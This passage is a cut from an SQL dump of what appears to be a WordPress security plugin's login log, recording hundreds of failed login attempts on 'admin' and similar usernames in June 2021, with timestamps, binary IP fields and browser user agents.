Firefox/62.0'),(695,1157,1624574625.511535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(696,1158,1624574682.945396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(697,1160,1624574813.597814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(698,1160,1624574813.633887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(699,1161,1624574905.710378,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(700,1162,1624574986.124763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(701,1163,1624575041.376614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(702,1163,1624575041.432740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(703,1164,1624575085.399340,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(704,1165,1624575158.689711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(705,1166,1624575212.428869,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(706,1166,1624575212.461536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(707,1169,1624575446.066983,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(708,1173,1624575824.719009,1,'loginFailInvalidUsername','bzdsadmin',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(709,1175,1624575964.375137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(710,1176,1624576014.617283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(711,1177,1624576046.708391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^I�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(712,1178,1624576088.097811,1,'loginFailInvalidUsername','mojo_services_admin',0,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(713,1180,1624576214.967785,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(714,1183,1624576417.588702,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(715,1184,1624576463.685490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\5`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(716,1187,1624576768.518032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(717,1188,1624576818.511533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g\rZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(718,1203,1624577804.167329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(719,1204,1624577827.103076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(720,1206,1624577984.607943,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(721,1208,1624578117.545649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(722,1209,1624578154.067608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(723,1210,1624578266.229358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(724,1211,1624578303.675433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(725,1213,1624578455.768476,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����tv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(726,1216,1624578656.914211,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(727,1218,1624578793.869603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(728,1220,1624578924.152723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(729,1223,1624579128.398957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(730,1223,1624579128.432168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(731,1224,1624579187.275606,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�$[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(732,1227,1624579394.896973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(733,1228,1624579438.006550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�AS','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(734,1229,1624579476.735275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(735,1229,1624579476.798896,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(736,1230,1624579532.773379,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(737,1232,1624579704.837759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(738,1233,1624579762.625818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(739,1236,1624579983.986381,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(740,1242,1624580426.339654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E1�^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(741,1243,1624580474.614442,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(742,1244,1624580543.763612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(743,1244,1624580543.775492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(744,1245,1624580596.368736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��cP%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(745,1262,1624581795.267854,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\5`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(746,1265,1624582014.939048,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(747,1268,1624582203.997330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(748,1269,1624582261.744467,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(749,1271,1624582395.702331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(750,1272,1624582451.672069,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(751,1275,1624582635.243425,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(752,1276,1624582676.147629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(753,1283,1624583094.520221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(754,1284,1624583204.507409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(755,1287,1624583566.831084,1,'loginFailInvalidUsername','itadmin',0,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(756,1289,1624583725.094846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����<>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(757,1290,1624583824.618129,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(758,1296,1624584224.634367,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(759,1297,1624584276.694520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(760,1305,1624584785.721509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���zX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(761,1307,1624585005.681566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(762,1308,1624585043.036927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(763,1313,1624585464.783326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(764,1314,1624585503.503488,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(765,1321,1624585944.884747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(766,1322,1624586004.812320,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g9��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(767,1330,1624586424.888592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(768,1332,1624586526.194678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(769,1333,1624586614.989721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(770,1334,1624586705.132719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɷC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(771,1335,1624586750.218890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(772,1338,1624587004.656547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(773,1340,1624587145.447713,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(774,1340,1624587145.483071,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(775,1341,1624587188.370912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(776,1341,1624587188.415932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(777,1345,1624587445.985555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(778,1345,1624587446.114984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(779,1353,1624588139.349941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g\'�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(780,1357,1624588479.774967,1,'loginFailInvalidUsername','aadmin',0,'\0\0\0\0\0\0\0\0\0\0���2:?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(781,1360,1624588664.748567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(782,1361,1624588689.085775,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���#p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(783,1365,1624588953.433372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"k(o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(784,1366,1624589024.924412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2:?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(785,1374,1624589587.130779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(786,1375,1624589627.851740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(787,1377,1624589754.214665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(788,1378,1624589766.617952,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\r���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(789,1378,1624589766.657202,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\r���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(790,1379,1624589800.197172,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���zX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(791,1380,1624589898.534292,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(792,1381,1624589955.876777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��UX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(793,1389,1624590686.214133,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(794,1390,1624590709.896332,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(795,1391,1624590756.462362,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(796,1392,1624590769.597452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(797,1393,1624590814.570970,1,'loginFailInvalidUsername','myadmin',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(798,1394,1624590879.754593,1,'loginFailInvalidUsername','aas_admin',0,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(799,1395,1624590932.634809,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(800,1396,1624591065.610221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(801,1397,1624591184.504983,1,'loginFailInvalidUsername','badmin',0,'\0\0\0\0\0\0\0\0\0\0���c?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(802,1398,1624591257.329960,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����o)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(803,1399,1624591307.680971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��PP��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(804,1400,1624591378.600104,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(805,1414,1624592435.703770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(806,1415,1624592482.751049,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(807,1417,1624592595.710514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(808,1417,1624592595.751839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(809,1419,1624592747.080403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(810,1425,1624593076.178314,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(811,1427,1624593224.964703,1,'loginFailInvalidUsername','web-admin',0,'\0\0\0\0\0\0\0\0\0\0��%:0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(812,1428,1624593279.473492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(813,1430,1624593559.340950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(814,1431,1624593617.507985,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(815,1432,1624593664.784786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(816,1433,1624593734.990109,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(817,1438,1624594104.957787,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(818,1442,1624594426.129290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(819,1443,1624594495.493440,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(820,1447,1624594747.566626,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7g0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(821,1450,1624594945.474288,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(822,1451,1624594987.798680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(823,1452,1624595065.810619,1,'loginFailInvalidUsername','badmin',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(824,1453,1624595136.861196,1,'loginFailInvalidUsername','cadmin',0,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(825,1456,1624595327.060069,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 